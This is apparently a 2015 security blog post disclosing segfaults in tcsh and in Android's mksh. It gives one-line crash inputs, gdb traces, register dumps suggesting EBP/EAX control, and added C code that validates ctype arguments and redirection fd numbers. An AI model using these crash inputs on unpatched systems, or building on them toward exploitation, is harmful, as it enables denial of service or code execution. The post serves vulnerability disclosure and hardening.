Friday 3 April 2015

Crashing Shells

A quick post about two crashes I found in tcsh (the default FreeBSD shell, although the BSD version does not segfault) and mksh (the default shell on Android). As I'm not planning to research these further, I'll just leave them here. Maybe someone will figure out whether any of this can be exploited somehow.

tcsh:
1. Affected version
tcsh 6.18.01 and maybe older. The FreeBSD version handled it just fine.

2. PoC
$ perl -e 'print "\$?:\x80"' | tcsh

Program received signal SIGSEGV, Segmentation fault.
0x080d827a in xputchar (c=8388738) at sh.print.c:156
156 if(iscntrl(c) && (ASC(c) < 0x80 || MB_CUR_MAX == 1)) {
(gdb) x/i $eip
=> 0x80d827a : movzwl (%eax,%ebx,2),%edx
The last byte of the printed string (the \x80 in the PoC above, which was highlighted in red in the original post) can be anything > 0x79 and will still trigger the crash.
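The gdb output above shows xputchar() calling iscntrl() with c=8388738, which is far outside what the ctype functions accept: EOF or a value representable as unsigned char (0..255). On glibc the classification macros index a table of unsigned shorts with the argument, which is exactly the movzwl (%eax,%ebx,2) instruction at the crash address, so an out-of-range c reads outside that table. The following is an added example written for this post, not tcsh's code: a range-checked wrapper around iscntrl() and a byte-counting helper that never feeds a negative or oversized value to ctype. The function names and the sample buffer are my own construction.

```c
/* Added example (not tcsh's code): guard ctype calls against out-of-range
 * arguments. The <ctype.h> contract is "EOF or unsigned char"; anything
 * else is undefined behaviour, and on glibc it is an out-of-bounds read
 * of the classification table. */
#include <ctype.h>
#include <limits.h>
#include <stdio.h>
#include <string.h>

/* Range-checked wrapper: 1 = control character, 0 = not a control
 * character, -1 = the argument violates the ctype contract (a caller
 * bug that the unguarded call would turn into an out-of-bounds read). */
int is_control_byte(int c)
{
    if (c == EOF)
        return 0;
    if (c < 0 || c > UCHAR_MAX)
        return -1;
    return iscntrl((unsigned char)c) ? 1 : 0;
}

/* Count control bytes in a buffer the safe way: every byte is widened
 * through unsigned char, so bytes >= 0x80 never become negative ints. */
size_t count_control_bytes(const unsigned char *buf, size_t len)
{
    size_t n = 0;
    for (size_t i = 0; i < len; i++)
        if (is_control_byte(buf[i]) == 1)
            n++;
    return n;
}

/* Constructed sample: ESC [ 0 m followed by the 0x80 byte from the PoC.
 * In the default "C" locale only ESC is a control character here. */
static const unsigned char sample[] = { 0x1b, '[', '0', 'm', 0x80 };

int main(void)
{
    printf("control bytes in sample: %zu\n",
           count_control_bytes(sample, sizeof sample));
    /* 8388738 is the value of c in the gdb output above. */
    printf("is_control_byte(8388738) = %d (out of contract)\n",
           is_control_byte(8388738));
    return 0;
}
```

The wrapper returns -1 instead of guessing, so a caller that ever sees -1 knows it passed a multibyte or flag-carrying value where a plain byte was expected; that is the condition a printing routine should strip or translate before classifying.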

Android shell / mksh:

1. Affected version
mksh-R50e and maybe older. Tested on the latest source version and on a Nexus running Android 5.0.1.

2. PoC

D:\Android\sdk\platform-tools>adb shell # run shell
shell@mako:/ $ cd sdcard # must be a dir that is not read-only
cd sdcard
shell@mako:/sdcard $ 4444444444444>4 # actual input that causes the crash
4444444444444>4

D:\Android\sdk\platform-tools> # our shell died 


It seems to crash at exec.c:1415, in iosetup(), on the line: if (e->savefd[iop->unit] == 0) {
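The crash line indexes the saved-fd table with the unit number parsed from the redirection, and a token like 4444444444444>4 supplies a number no fixed-size table can hold. The following is an added example written for this post, not mksh's code, and it does not claim to reproduce mksh's real parse path: a simplified redirection-prefix parser in the unchecked style beside a version that validates the number before it is ever used as an index. NUFILE, struct env and all function names are illustrative assumptions.

```c
/* Added example (not mksh's code): parse the fd prefix of a redirection
 * token and look it up in a saved-fd table, unchecked beside checked.
 * NUFILE, struct env and the function names are assumptions for this
 * example, not mksh's definitions. */
#include <ctype.h>
#include <errno.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define NUFILE 32 /* assumed size of the per-shell saved-fd table */

struct env {
    short savefd[NUFILE]; /* saved fd per unit, 0 = nothing saved */
};

/* Unchecked: accumulate the digits before '>' with no overflow or range
 * check. The unsigned accumulator wraps modulo 2^32 (a signed int would
 * overflow, which is undefined), so "4444444444444" yields a unit far
 * beyond any 32-entry table. Only the computed index is returned here;
 * using it as a subscript is the out-of-bounds access. */
unsigned redir_unit_unchecked(const char *tok)
{
    unsigned unit = 0;
    for (const char *p = tok; *p != '\0' && *p != '>'; p++)
        unit = unit * 10u + (unsigned)(*p - '0');
    return unit;
}

/* Checked: returns the unit for a token like "2>file", 1 for a bare ">",
 * and -1 when there is no '>', the prefix is not all digits, the number
 * overflows long, or the unit lies outside [0, NUFILE). */
int redir_unit_checked(const char *tok)
{
    const char *gt = strchr(tok, '>');
    if (gt == NULL)
        return -1;
    if (gt == tok)
        return 1; /* bare ">" redirects stdout */
    for (const char *p = tok; p < gt; p++)
        if (!isdigit((unsigned char)*p))
            return -1;
    errno = 0;
    char *end;
    long v = strtol(tok, &end, 10);
    if (errno == ERANGE || end != gt)
        return -1;
    if (v < 0 || v >= NUFILE)
        return -1;
    return (int)v;
}

/* The lookup the crash site performs, done only after validation.
 * Returns the saved fd for the unit, or -1 if the token was rejected. */
int savefd_lookup_checked(const struct env *e, const char *tok)
{
    int unit = redir_unit_checked(tok);
    if (unit < 0)
        return -1;
    return e->savefd[unit];
}

int main(void)
{
    struct env e;
    memset(&e, 0, sizeof e);
    e.savefd[2] = 7;                      /* constructed table entry */
    const char *bad = "4444444444444>4";  /* the token from the post */
    printf("unchecked unit for %s: %u (table has %d entries)\n",
           bad, redir_unit_unchecked(bad), NUFILE);
    printf("checked lookup for %s: %d\n", bad, savefd_lookup_checked(&e, bad));
    printf("checked lookup for 2>x: %d\n", savefd_lookup_checked(&e, "2>x"));
    return 0;
}
```

The two register dumps below, with EBP varying with the digits typed, are what an index derived from an unchecked, wrapped number looks like from the debugger; the checked parser turns every such token into a rejected redirection instead.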

Update:
By manipulating the first part of the expression (the number before the >) we can control the EAX and EBP values, e.g.:
$ 10947955850>1

Program received signal SIGSEGV, Segmentation fault.
0x80009c92 in ?? ()
(gdb) i r
eax            0x8c8c8c8a       -1936946038
ecx            0x3      3
edx            0x0      0
ebx            0x8003be50       -2147238320
esp            0xbffff210       0xbffff210
ebp            0x991da068       0x991da068
esi            0x80044a54       -2147202476
edi            0x2      2
eip            0x80009c92       0x80009c92
eflags         0x10206  [ PF IF RF ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51
$ 1000200887800>1
Program received signal SIGSEGV, Segmentation fault.
0x80009c92 in ?? ()
(gdb) i r
eax            0xe09e5df8       -526492168
ecx            0x3      3
edx            0x0      0
ebx            0x8003be50       -2147238320
esp            0xbffff210       0xbffff210
ebp            0x41414344       0x41414344
esi            0x80044a54       -2147202476
edi            0x2      2
eip            0x80009c92       0x80009c92
eflags         0x10206  [ PF IF RF ]
cs             0x73     115
ss             0x7b     123
ds             0x7b     123
es             0x7b     123
fs             0x0      0
gs             0x33     51
(gdb) bt
#0  0x80009c92 in ?? ()
Backtrace stopped: Cannot access memory at address 0x41414348
The bug has been patched in the latest release, mksh R50f.
The bug report can be seen here and the fix here.